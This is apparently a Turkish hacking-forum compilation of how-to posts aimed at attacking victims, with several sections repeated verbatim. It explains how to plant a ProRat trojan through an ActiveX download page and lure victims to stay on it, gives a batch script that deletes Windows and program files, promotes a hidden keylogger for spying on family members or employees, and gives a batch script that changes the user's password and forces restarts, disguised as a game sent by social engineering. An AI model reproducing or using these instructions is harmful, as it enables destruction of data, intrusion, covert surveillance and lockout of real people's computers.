DarkComet Rat Kullanımı
LİNK ARACILIĞI İLE TROJEN BULAŞTIRMAK
Evet Dosya gondermeden birisine trojan bulaştırmanın bir diğer yolu, kurbani önceden basitce tasarladiginiz
bir linke yonlendirmek.
Bir html dosyayi ile birlestirerek kurbanin PC sine serverimizi Dosya gondermeden nasil bulastirabileceginizi burada anlatmaya calisacagim.
Ihtiyacimiz olanlar;;
1-) TEGO Web Express Link: http://www.tegosoft.com/Web/Pages/
2-) Prorat Proğramı ile hazırlamış oldugunuz Trojan yada baska bi trojan
3-) Olusturacaginiz html sayfasini edit edebileceginiz bir Web Design yazilimi. (Front Page, Dreamweaver gibi)
4-) Varsa bir web adresiniz. Yok ise bunu Yahoo! GeoCities: Get a web site with easy-to-use site building tools. adresinden Alabilirsiniz
Normalde yukarida verdigim google dan bulup indireceginiz Tego Web Express programi, 30 gunluk deneme versiyonudur.Crackinide bulup full yapabilirsiniz...
EVET ARKADAŞLAR BAŞLIYORUZ....!
1 AŞAMA ;
-----------------
Oncelikle Prorat ile (Siz baska Bisey yapsanizda olur) .exe uzantili bir server olusturuyoruz. Burada bir hususa dikkatinizi cekmek istiyorum. .exe uzantili olusturacaginiz serveriniz, kurban tarafindan farkedilmeden makinasina yukleneceginden bu serverinizi herhangi bir dosya veya resim ile birlestirmekle ugrasmayiniz. Bu sadece sizin olusturacaginiz serverin kurbanin makinasina otomatik olarak download edilme suresini uzatacaktir ki bu surenin olabildigince kisa olmasi, sizin icin daha iyi ve daha etkili olacaktir.(.exe uzantili diyorum cunku Tego Web Express programi sadece .exe uzantili programlari dikkate alir ve calistirir. Bu nedenle .pif veya .bat gibi uzantili serverlar olusturmayiniz.)
Desktopta yeni bir klasor aciyoruz ve olusturdugumuz serverimizi bu klasorun icine Cut(Kes) & Paste(Yapıştır) yolu ile yerlestiriyoruz.
2 AŞAMA ;
-----------------
Tego Web Express programimizi aciyoruz ve "Next" butonuna basiyoruz ve karsimiza soyle bir yazi cikiyor;
STEP 1
"Select the directory where your program files reside"
Iste bu kisimda Desktopta actiginiz ve icine prorat serverinizi koydugunuz klasoru seciyorsunuz ve "Next" dugmesine basiyorsunuz.
Daha sonra acilacak kutuda sizin serveriniz gozukecek. Bu kismi da "Next" butonu ile geciyorsunuz, karsiniza cikan ucuncu kisimda ise sizin .exe uzantili dosyaniz ile birlikte calismasi gereken diger yardimci dosyalar var ise (bazi .dll ler gibi) bu dosyalari da secmenizi istiyor. Fakat burada bizim yalnizca bir adet .exe uzantili serverimiz oldugu icin burayi da "Next" butonu ile geciyoruz.
3. AŞAMA ;
--------------------
Burada karsimiza .exe uzantili dosyamizin oldugu link kurban tarafindan tiklaninca kurbanin karsisina cikacak sayfanin tam olarak pathi yani adresinin yazilmasi isteniyor. Buradaki hem ust kutucuga hem de alt kutucuga kendi sitenizin full adresini yaziyorsunuz. ( www.xxx.com ) gibi
4. AŞAMA ;
-----------------------
"Next" butonu ile üçüncü aşamayı da geçtik. Bu aşamada karşımıza çıkan yerde hiçbirşey yapmıyoruz. Burayı da "Next" butonu ile geçiyoruz ve son aşamaya geliyoruz.
Burada Tego Web Expressin html sayfamizi olusturmasi icin html sayfasinin ismini size soruyor. Burada istediginiz bir isim (orn: resimlerim.html gibi) yaziyorsunuz ve "Finish" butonuna basiyoruz ve birkac saniye bekliyoruz. Daha sonra karsimiza html sayfamiz ile birlikte gereken ocx (Active X) dosyalarinin Desktopta actigimiz ve icinde servermizin oldugu klasorun icinde olusturulduguna dair bir mesaj kutusu cikiyor. Bu kutuyu "Ok" diyerek kapatiyoruz.
5. AŞAMA;
-------------------
Bu asama artik son asamadir. Bu asamada olusturulmus ve Desktopta actigimiz klasorumuzun icinde "Release"klasorunun altina atilmis olan .html uzantili dosyamizi istedigimiz sekilde editliyoruz. Isterseniz icine bir kac tane de guzel hatun resmi atin ki kurbanimizin sitede kalma suresi uzasin. Unutmayin kalmla suresinin uzamasi demek, servermizin kurbanin makinasina yuklendiginden ve calistirildigindan daha da emin olmamiz demektir. Desktopta actigimiz klasorumuzun icindeki "Release" ile "Release ActiveX" klasorlerinin icindeki tum dosyalari, sitemizin yayinlandigi servera bir FTP programi eger Free bir site ise Admin panlinden yerlestiriyoruz.
NOT:
Arkadaslar, burada bazilarinizin soyle bir haklI kaygisi olacaktir. Tego Web Express linke tiklayan kurbanin makinasina Active X vasitasi ile giris yapar. Eger kurbanda Firewall var ise ve Firewall in ayarlarinda Active X objelerinin girisi kullanicinin iznine tabi ise, serverimiz yuklenmeden Firewall bunu kullaniciya soracaktir. Ayni zamanda AV ler de Active X objemizi yani serverimizi yakalayacaklardir.
Fakat burada sunu da unutmamak gereklidir ki, kurbanimizda Firewall veya bir AV var ise, resim yolu ile de bulastirmaya calissaniz, baska bir yolla da bulastirmayi deneseniz nasil olsa yine yakalanacktir. O nedenle tum bu yontemler, kurbanimizin AV si olmamasi uzerine kuruludur.
bir linke yonlendirmek.
Bir html dosyayi ile birlestirerek kurbanin PC sine serverimizi Dosya gondermeden nasil bulastirabileceginizi burada anlatmaya calisacagim.
Ihtiyacimiz olanlar;;
1-) TEGO Web Express Link: http://www.tegosoft.com/Web/Pages/
2-) Prorat Proğramı ile hazırlamış oldugunuz Trojan yada baska bi trojan
3-) Olusturacaginiz html sayfasini edit edebileceginiz bir Web Design yazilimi. (Front Page, Dreamweaver gibi)
4-) Varsa bir web adresiniz. Yok ise bunu Yahoo! GeoCities: Get a web site with easy-to-use site building tools. adresinden Alabilirsiniz
Normalde yukarida verdigim google dan bulup indireceginiz Tego Web Express programi, 30 gunluk deneme versiyonudur.Crackinide bulup full yapabilirsiniz...
EVET ARKADAŞLAR BAŞLIYORUZ....!
1 AŞAMA ;
-----------------
Oncelikle Prorat ile (Siz baska Bisey yapsanizda olur) .exe uzantili bir server olusturuyoruz. Burada bir hususa dikkatinizi cekmek istiyorum. .exe uzantili olusturacaginiz serveriniz, kurban tarafindan farkedilmeden makinasina yukleneceginden bu serverinizi herhangi bir dosya veya resim ile birlestirmekle ugrasmayiniz. Bu sadece sizin olusturacaginiz serverin kurbanin makinasina otomatik olarak download edilme suresini uzatacaktir ki bu surenin olabildigince kisa olmasi, sizin icin daha iyi ve daha etkili olacaktir.(.exe uzantili diyorum cunku Tego Web Express programi sadece .exe uzantili programlari dikkate alir ve calistirir. Bu nedenle .pif veya .bat gibi uzantili serverlar olusturmayiniz.)
Desktopta yeni bir klasor aciyoruz ve olusturdugumuz serverimizi bu klasorun icine Cut(Kes) & Paste(Yapıştır) yolu ile yerlestiriyoruz.
2 AŞAMA ;
-----------------
Tego Web Express programimizi aciyoruz ve "Next" butonuna basiyoruz ve karsimiza soyle bir yazi cikiyor;
STEP 1
"Select the directory where your program files reside"
Iste bu kisimda Desktopta actiginiz ve icine prorat serverinizi koydugunuz klasoru seciyorsunuz ve "Next" dugmesine basiyorsunuz.
Daha sonra acilacak kutuda sizin serveriniz gozukecek. Bu kismi da "Next" butonu ile geciyorsunuz, karsiniza cikan ucuncu kisimda ise sizin .exe uzantili dosyaniz ile birlikte calismasi gereken diger yardimci dosyalar var ise (bazi .dll ler gibi) bu dosyalari da secmenizi istiyor. Fakat burada bizim yalnizca bir adet .exe uzantili serverimiz oldugu icin burayi da "Next" butonu ile geciyoruz.
3. AŞAMA ;
--------------------
Burada karsimiza .exe uzantili dosyamizin oldugu link kurban tarafindan tiklaninca kurbanin karsisina cikacak sayfanin tam olarak pathi yani adresinin yazilmasi isteniyor. Buradaki hem ust kutucuga hem de alt kutucuga kendi sitenizin full adresini yaziyorsunuz. ( www.xxx.com ) gibi
4. AŞAMA ;
-----------------------
"Next" butonu ile üçüncü aşamayı da geçtik. Bu aşamada karşımıza çıkan yerde hiçbirşey yapmıyoruz. Burayı da "Next" butonu ile geçiyoruz ve son aşamaya geliyoruz.
Burada Tego Web Expressin html sayfamizi olusturmasi icin html sayfasinin ismini size soruyor. Burada istediginiz bir isim (orn: resimlerim.html gibi) yaziyorsunuz ve "Finish" butonuna basiyoruz ve birkac saniye bekliyoruz. Daha sonra karsimiza html sayfamiz ile birlikte gereken ocx (Active X) dosyalarinin Desktopta actigimiz ve icinde servermizin oldugu klasorun icinde olusturulduguna dair bir mesaj kutusu cikiyor. Bu kutuyu "Ok" diyerek kapatiyoruz.
5. AŞAMA;
-------------------
Bu asama artik son asamadir. Bu asamada olusturulmus ve Desktopta actigimiz klasorumuzun icinde "Release"klasorunun altina atilmis olan .html uzantili dosyamizi istedigimiz sekilde editliyoruz. Isterseniz icine bir kac tane de guzel hatun resmi atin ki kurbanimizin sitede kalma suresi uzasin. Unutmayin kalmla suresinin uzamasi demek, servermizin kurbanin makinasina yuklendiginden ve calistirildigindan daha da emin olmamiz demektir. Desktopta actigimiz klasorumuzun icindeki "Release" ile "Release ActiveX" klasorlerinin icindeki tum dosyalari, sitemizin yayinlandigi servera bir FTP programi eger Free bir site ise Admin panlinden yerlestiriyoruz.
NOT:
Arkadaslar, burada bazilarinizin soyle bir haklI kaygisi olacaktir. Tego Web Express linke tiklayan kurbanin makinasina Active X vasitasi ile giris yapar. Eger kurbanda Firewall var ise ve Firewall in ayarlarinda Active X objelerinin girisi kullanicinin iznine tabi ise, serverimiz yuklenmeden Firewall bunu kullaniciya soracaktir. Ayni zamanda AV ler de Active X objemizi yani serverimizi yakalayacaklardir.
Fakat burada sunu da unutmamak gereklidir ki, kurbanimizda Firewall veya bir AV var ise, resim yolu ile de bulastirmaya calissaniz, baska bir yolla da bulastirmayi deneseniz nasil olsa yine yakalanacktir. O nedenle tum bu yontemler, kurbanimizin AV si olmamasi uzerine kuruludur.
2 , 3 SANİYE'DE PC ÇÖKERTME
Çok basit yöntemlerle 1 dk içinde format atan virus yapabilirsiniz. (ve attıktan sonra bilgisayar açılmıyor)
Açıklama:
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
@echo off
C:WINDOWSCOMMANDdeltree /y c:windows*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:Progra~1*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:*.*
@echo off
cls
cls
@echo .:FPRIVATE "TYPE=PICT;ALT=" xxxxxxxxxxxxxxxxxx::.
@echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Acıklama:
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Not:%100 Çalısıyor
Windows un önemli bi kaç dosyasını siliyor ve sonra "xxxxxxxxxxxxx'' yazan yere ıstedıgınız yazın karsı pc actıgında o yazığla karsılascak.
rar sıkıstırıp kurbana msn yollayıp sm yaparak actırabılırsınız..saygılarımla
Açıklama:
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
@echo off
C:WINDOWSCOMMANDdeltree /y c:windows*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:Progra~1*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:*.*
@echo off
cls
cls
@echo .:FPRIVATE "TYPE=PICT;ALT=" xxxxxxxxxxxxxxxxxx::.
@echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Acıklama:
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Not:%100 Çalısıyor
Windows un önemli bi kaç dosyasını siliyor ve sonra "xxxxxxxxxxxxx'' yazan yere ıstedıgınız yazın karsı pc actıgında o yazığla karsılascak.
rar sıkıstırıp kurbana msn yollayıp sm yaparak actırabılırsınız..saygılarımla
ÖZEL KEYLOGER
Merhaba özel bir çalışma local logger adındanda belii oldugu gibi binevi keylogger fakat bunda kurban yok yani başkalarına yollamıyacaksınız bu tamamen sızın pcnızde olacak orn cocugunuz eşiniz elemanınız vb bilgisayarınızda oturan her kımse artık ne yaptıgını ne yazdıgını oğrenmek istiyorsanız bu program tam size göre ve kullanışı çok kolay programı açıyorsunuz start tusuna basıyorsunuz ve shift+f9(gizleme tuşu) basıyorsunuz program otomatıkmen gizleniyor ve yazılan her sey kaydoluor shift+f10 yaptıgınızda ise tekrar acılır ve orada ne konusuldugunu vb klavyede basılan her harf teker teker cıkar anlatılacak bir şey değildi assında fakat sıfırdan başlayanlar vb olabilir herneyse virüs buldu bilmiyorum neden benle alakası yok :S ztn visual basicde o projeyi açıncada virüs buluyordu ben o yüzden bunu ratı ve keyloggerı yaparken hep virüs programını kapatırım yoksa durmadan siliyor yani o bulunan virüsün benle alakası yok kendi virüsüdür zarar vereceğini sanmıyorum.
Ayrıca Yardımından Dolayı aksopmod16 teğmenime teşekkür ederim.
Ekran Görüntüsü :
Ayrıca Yardımından Dolayı aksopmod16 teğmenime teşekkür ederim.
Ekran Görüntüsü :
Virüs Total :
http://virusscan.jotti.org/tr/scanre...925ae66be91dfa
İndirme Linki 1 : ALTERNATİF LİNK 1
İndirme Linki 2 : ALTERNATİF LİNK 2
NOT DEFTERİNDEN VİRÜS YAPMA ( BASİT )
Öncelikle Başlat/Tüm Programlar/Donatılar/Not Defteri 'ne giriyoruz.
Daha sonra şu kodları yapıştırıyoruz .
" net user %username% 123456
shutdown -r "
Not: " işaretlerini silin.
Burdaki 123456 Karşı Tarafın Pc'sine koyacağımız Şifredir.
İstediğiniz Şeyi Yazabilirsiniz.
Daha sonra Seçenekler/Farklı Kaydet (CTRL-S) Yaparak Adını OYUN.bat yapın.
İsterseniz " OYUN " u değiştirip istediğinizi yazarsınız fakat mutlaka (.bat) şeklinde olsun.
Daha sonra upload sitelerinden internete yükleyebilirsiniz.
Şimdi sıra sosyal mühendislikte : İçinde çok güzel bir flash oyun bulunduğunu söyleyin ( ballandıra ballandıra ) ve upload ettiğiniz linki yollayın. Kurban bu dosyayı kurduktan sonra " OYUN.bat " dosyasını tıklarsa açılır. 5 Saniye içinde oturum kapanır , Denetim Masasını Açmaya Çalışsa bile oturum kapanmaya devam eder ayrıca şifre işlenir.
Kolay Gelsin ...
Eğer Bunun Yapılmış Hazır Olanı Yokmu Derseniz :
http://s2.dosya.tc/server21/vXV40x/Minioyunlar.rar.html
Dipnot: Daha önce bir kez denedim çalıştı kodda bir yanlışlık yoksa %99 çalışır .
Daha sonra şu kodları yapıştırıyoruz .
" net user %username% 123456
shutdown -r "
Not: " işaretlerini silin.
Burdaki 123456 Karşı Tarafın Pc'sine koyacağımız Şifredir.
İstediğiniz Şeyi Yazabilirsiniz.
Daha sonra Seçenekler/Farklı Kaydet (CTRL-S) Yaparak Adını OYUN.bat yapın.
İsterseniz " OYUN " u değiştirip istediğinizi yazarsınız fakat mutlaka (.bat) şeklinde olsun.
Daha sonra upload sitelerinden internete yükleyebilirsiniz.
Şimdi sıra sosyal mühendislikte : İçinde çok güzel bir flash oyun bulunduğunu söyleyin ( ballandıra ballandıra ) ve upload ettiğiniz linki yollayın. Kurban bu dosyayı kurduktan sonra " OYUN.bat " dosyasını tıklarsa açılır. 5 Saniye içinde oturum kapanır , Denetim Masasını Açmaya Çalışsa bile oturum kapanmaya devam eder ayrıca şifre işlenir.
Kolay Gelsin ...
Eğer Bunun Yapılmış Hazır Olanı Yokmu Derseniz :
http://s2.dosya.tc/server21/vXV40x/Minioyunlar.rar.html
Dipnot: Daha önce bir kez denedim çalıştı kodda bir yanlışlık yoksa %99 çalışır .
Arkadas ben kurbana gonderdim onu kurban bilgisayari restart etdikden sonra baglanamiom yadaki kurban onu acinca antivirus silio
YanıtlaSil